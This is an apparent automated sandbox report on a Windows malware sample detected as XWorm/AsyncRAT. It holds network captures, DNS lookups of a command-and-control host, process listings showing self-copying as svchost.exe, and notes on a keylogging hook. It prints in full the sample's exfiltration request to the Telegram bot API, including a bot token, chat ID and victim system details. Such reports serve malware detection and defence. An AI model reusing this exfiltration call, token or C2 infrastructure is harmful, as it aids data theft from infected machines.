                                                                                                                                        Nov 17, 2024 19:24:40.425312042 CET4978661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:40.426697969 CET4984261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:40.430157900 CET6158649786147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:40.431699038 CET6158649842147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:40.431794882 CET4984261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:40.448079109 CET4984261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:40.453284025 CET6158649842147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:48.913724899 CET6158649842147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:48.913908958 CET4984261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:51.800555944 CET4984261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:51.803515911 CET4990761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:51.805999994 CET6158649842147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:51.808681011 CET6158649907147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:51.808762074 CET4990761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:51.843795061 CET4990761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:51.848776102 CET6158649907147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:00.290904999 CET6158649907147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:00.291013956 CET4990761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:01.425738096 CET4990761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:01.427218914 CET4996361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:01.430773020 CET6158649907147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:01.432547092 CET6158649963147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:01.432611942 CET4996361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:01.450416088 CET4996361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:01.455367088 CET6158649963147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:09.916040897 CET6158649963147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:09.916171074 CET4996361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:10.238027096 CET4996361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:10.239619017 CET4997761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:10.243217945 CET6158649963147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:10.244642019 CET6158649977147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:10.244743109 CET4997761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:10.264853954 CET4997761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:10.270292997 CET6158649977147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:18.734664917 CET6158649977147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:18.734812975 CET4997761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:21.581640959 CET4997761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:21.584903002 CET4997861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:21.586668015 CET6158649977147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:21.589867115 CET6158649978147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:21.589946032 CET4997861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:21.608792067 CET4997861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:21.613821983 CET6158649978147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:22.211607933 CET4997861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:22.216542959 CET6158649978147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:23.206845045 CET4997861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:23.212003946 CET6158649978147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:24.472527027 CET4997861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:24.477756023 CET6158649978147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:28.206935883 CET4997861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:28.211770058 CET6158649978147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:29.913688898 CET4997861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:29.920819044 CET6158649978147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:30.088427067 CET6158649978147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:30.091506958 CET4997861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:31.816134930 CET4997861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:31.819116116 CET4997961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:31.821252108 CET6158649978147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:31.824223042 CET6158649979147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:31.824295998 CET4997961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:31.849255085 CET4997961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:31.854182005 CET6158649979147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:31.863157034 CET4997961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:31.868168116 CET6158649979147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:33.941131115 CET4997961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:33.946227074 CET6158649979147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:40.334148884 CET6158649979147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:40.334260941 CET4997961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:41.925318003 CET4997961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:41.928324938 CET4998061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:41.930330038 CET6158649979147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:41.933310032 CET6158649980147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:41.933374882 CET4998061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:41.955598116 CET4998061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:41.960627079 CET6158649980147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:43.707263947 CET4998061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:43.712275028 CET6158649980147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:47.644527912 CET4998061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:47.649574041 CET6158649980147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:47.659884930 CET4998061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:47.666845083 CET6158649980147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:50.422017097 CET6158649980147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:50.423572063 CET4998061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:52.693392992 CET4998061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:52.693979979 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:52.698498964 CET6158649980147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:52.698884010 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:52.699465990 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:52.716463089 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:52.721440077 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:52.723473072 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:52.728842020 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:57.894483089 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:57.899842978 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:57.925570965 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:57.930525064 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:57.941236019 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:57.946202040 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:57.956886053 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:57.961869001 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:57.972579956 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:57.978137016 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:00.863215923 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:00.869419098 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:01.183012962 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:01.183075905 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:03.003467083 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:03.005579948 CET4998261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:03.008445024 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:03.011014938 CET6158649982147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:03.011136055 CET4998261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:03.028002024 CET4998261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:03.032952070 CET6158649982147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:03.222429991 CET4998261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:03.227632999 CET6158649982147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:09.435931921 CET6158649993147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:09.435985088 CET6158649994147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:09.439353943 CET4999461586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:09.455524921 CET4999461586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:09.460539103 CET6158649994147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:09.739279032 CET4999461586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:09.744585991 CET6158649994147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:11.473169088 CET4999461586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:11.478343010 CET6158649994147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:17.918649912 CET6158649994147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:17.918735027 CET4999461586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:19.988346100 CET4999461586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:19.989413023 CET4999561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:19.994014978 CET6158649994147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:19.994613886 CET6158649995147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:19.994997978 CET4999561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:20.010523081 CET4999561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:20.015774965 CET6158649995147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:28.490392923 CET6158649995147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:28.490487099 CET4999561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:36.067286015 CET4999561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:36.067703962 CET4999661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:36.072477102 CET6158649995147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:36.072675943 CET6158649996147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:36.072832108 CET4999661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:36.089715958 CET4999661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:36.094845057 CET6158649996147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:44.555584908 CET6158649996147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:44.559386969 CET4999661586192.168.2.7147.185.221.23
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Nov 17, 2024 19:24:10.705328941 CET  50187        53         192.168.2.7  1.1.1.1
Nov 17, 2024 19:24:10.712631941 CET  53           50187      1.1.1.1      192.168.2.7
Nov 17, 2024 19:24:11.967971087 CET  54646        53         192.168.2.7  1.1.1.1
Nov 17, 2024 19:24:12.085794926 CET  62009        53         192.168.2.7  1.1.1.1
Nov 17, 2024 19:24:12.117975950 CET  53           62009      1.1.1.1      192.168.2.7
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                         Type            Class        DNS over HTTPS
Nov 17, 2024 19:24:10.705328941 CET  192.168.2.7  1.1.1.1  0x1007    Standard query (0)  api.telegram.org             A (IP address)  IN (0x0001)  false
Nov 17, 2024 19:24:11.967971087 CET  192.168.2.7  1.1.1.1  0xc5e0    Standard query (0)  time.windows.com             A (IP address)  IN (0x0001)  false
Nov 17, 2024 19:24:12.085794926 CET  192.168.2.7  1.1.1.1  0xc284    Standard query (0)  perfect-invest.gl.at.ply.gg  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                         CName                   Address          Type                    Class        DNS over HTTPS
Nov 17, 2024 19:24:10.712631941 CET  1.1.1.1    192.168.2.7  0x1007    No error (0)  api.telegram.org             -                       149.154.167.220  A (IP address)          IN (0x0001)  false
Nov 17, 2024 19:24:11.975219011 CET  1.1.1.1    192.168.2.7  0xc5e0    No error (0)  time.windows.com             twc.trafficmanager.net  -                CNAME (Canonical name)  IN (0x0001)  false
Nov 17, 2024 19:24:12.117975950 CET  1.1.1.1    192.168.2.7  0xc284    No error (0)  perfect-invest.gl.at.ply.gg  -                       147.185.221.23   A (IP address)          IN (0x0001)  false
• api.telegram.org

Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
0           192.168.2.7  49699        149.154.167.220  443               6312  C:\Users\user\Desktop\yF21ypxRB7.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-17 18:24:11 UTC  449                OUT
    GET /bot7602273147:AAGPHHPgO8DxUDOWK0ZCgtSD_Rua_8wVzrE/sendMessage?chat_id=6589427579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A95B5CEC98776D486C10E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20CO53M%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
2024-11-17 18:24:11 UTC  388                IN
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Sun, 17 Nov 2024 18:24:11 GMT
    Content-Type: application/json
    Content-Length: 450
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-17 18:24:11 UTC  450                IN
    Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 36 30 32 32 37 33 31 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 72 65 64 74 69 67 65 72 5f 73 65 72 76 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 72 65 64 74 69 67 65 72 73 65 72 76 65 72 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 35 38 39 34 32 37 35 37 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 21 20 4c 6f 78 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6c 6f 78 79 64 65 76 30 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 31 38 36 37 38 35 31 2c 22 74 65 78 74 22 3a 22 5c 75 32 36
    Data Ascii: {"ok":true,"result":{"message_id":80,"from":{"id":7602273147,"is_bot":true,"first_name":"redtiger_server","username":"redtigerserver_bot"},"chat":{"id":6589427579,"first_name":"! Loxy","username":"loxydev0","type":"private"},"date":1731867851,"text":"\u26

Target ID: 0
Start time: 13:24:04
Start date: 17/11/2024
Path: C:\Users\user\Desktop\yF21ypxRB7.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\yF21ypxRB7.exe"
Imagebase: 0x470000
File size: 39'936 bytes
MD5 hash: 640194B0D51307F362B74FD4A4A1761D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1245680814.0000000000472000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1245680814.0000000000472000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
Reputation: low
Has exited: false

Target ID: 2
Start time: 13:24:06
Start date: 17/11/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 13:24:06
Start date: 17/11/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 5
Start time: 13:24:06
Start date: 17/11/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 6
Start time: 13:24:07
Start date: 17/11/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 7
Start time: 13:24:11
Start date: 17/11/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 8
Start time: 13:24:18
Start date: 17/11/2024
Path: C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase: 0x580000
File size: 39'936 bytes
MD5 hash: 640194B0D51307F362B74FD4A4A1761D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                        • Detection: 79%, ReversingLabs
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:10
                                                                                                                                        Start time:13:24:26
                                                                                                                                        Start date:17/11/2024
                                                                                                                                        Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                                                                        Imagebase:0xee0000
                                                                                                                                        File size:39'936 bytes
                                                                                                                                        MD5 hash:640194B0D51307F362B74FD4A4A1761D
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:11
                                                                                                                                        Start time:15:22:24
                                                                                                                                        Start date:17/11/2024
                                                                                                                                        Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                        Imagebase:0x7ff62c610000
                                                                                                                                        File size:468'120 bytes
                                                                                                                                        MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:12
                                                                                                                                        Start time:15:22:24
                                                                                                                                        Start date:17/11/2024
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                        File size:862'208 bytes
                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true


                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:20.8%
                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                          Signature Coverage:0%
                                                                                                                                          Total number of Nodes:9
                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                          Execution graph (rendered graph not reproduced; node list recovered from the page): two call paths, 7ffaac5b2065 -> 7ffaac5b206d and 7ffaac5b286d -> 7ffaac5b287f -> 7ffaac5b20a8 -> 7ffaac5b20b1 -> 7ffaac5b28bb, each reaching a SetWindowsHookExW call and continuing at 7ffaac5b2af1. SetWindowsHookExW installs a Windows message hook, which is the mechanism behind the keystroke-logging signature listed for this sample.

                                                                                                                                          Control-flow Graph

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.3705880352.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffaac5b0000_yF21ypxRB7.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: CAL_^
                                                                                                                                          • API String ID: 0-3140518731
                                                                                                                                          • Opcode ID: 87584cd2be31ed5ec63e80b98d76ca6e9ff4bc83f8645dbb78c90901089cf79b
                                                                                                                                          • Instruction ID: 7e19f67bd6f4a16209ac6f6a5c9cd35d8035e85adf3f5dc66f399a876a0abd8b
                                                                                                                                          • Opcode Fuzzy Hash: 87584cd2be31ed5ec63e80b98d76ca6e9ff4bc83f8645dbb78c90901089cf79b
                                                                                                                                          • Instruction Fuzzy Hash: 2022C7A1F59A4A4FE794EB38C459679BBD6FF89301F408579E00EC32D3DE28A8458781

                                                                                                                                          Control-flow Graph

                                                                                                                                          Control-flow graph (rendered graph with executed/not-executed colouring not reproduced): function spanning 7ffaac5b6c16-7ffaac5b70d2, with one internal call to 7ffaac5b70d4 and no Windows API calls in the graph.
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.3705880352.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffaac5b0000_yF21ypxRB7.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3660d220e50a70738e217bee132eaae97421035fab4bb78a92c166ce4a52b2c2
                                                                                                                                          • Instruction ID: 204cbbc1f0993d221bf120a56836c9faf742792f274323de0e051580ef8baea3
                                                                                                                                          • Opcode Fuzzy Hash: 3660d220e50a70738e217bee132eaae97421035fab4bb78a92c166ce4a52b2c2
                                                                                                                                          • Instruction Fuzzy Hash: EFF1A530509A8E8FEBA8EF28C8557E93BD1FF55310F04826AE84DC7296DF3499458B81

                                                                                                                                          Control-flow Graph

                                                                                                                                          Control-flow graph (rendered graph with executed/not-executed colouring not reproduced): function spanning 7ffaac5b79c2-7ffaac5b7e4e, with one internal call to 7ffaac5b7e50 and no Windows API calls in the graph.
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.3705880352.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffaac5b0000_yF21ypxRB7.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: aa4775651289dfed308ba6b85a92c94d8894f29a2def8116e2af7d55dc508c3b
                                                                                                                                          • Instruction ID: f1eccbc00b041c27f3977e07809b0d9f8b3102f936bac692075cb7ea5d0300a8
                                                                                                                                          • Opcode Fuzzy Hash: aa4775651289dfed308ba6b85a92c94d8894f29a2def8116e2af7d55dc508c3b
                                                                                                                                          • Instruction Fuzzy Hash: 89E1C430908A8E8FEBA8DF28C8557E97BD1FF55350F04826EE84DC7291DE74A9448BC1

                                                                                                                                          Control-flow Graph

                                                                                                                                          Control-flow graph (rendered graph with executed/not-executed colouring not reproduced): function spanning 7ffaac5b2065-7ffaac5b2b2d; the block 7ffaac5b2ab2-7ffaac5b2aef calls SetWindowsHookExW, then continues at 7ffaac5b2af1 or 7ffaac5b2af7-7ffaac5b2b28.
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.3705880352.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffaac5b0000_yF21ypxRB7.jbxd
                                                                                                                                          Similarity
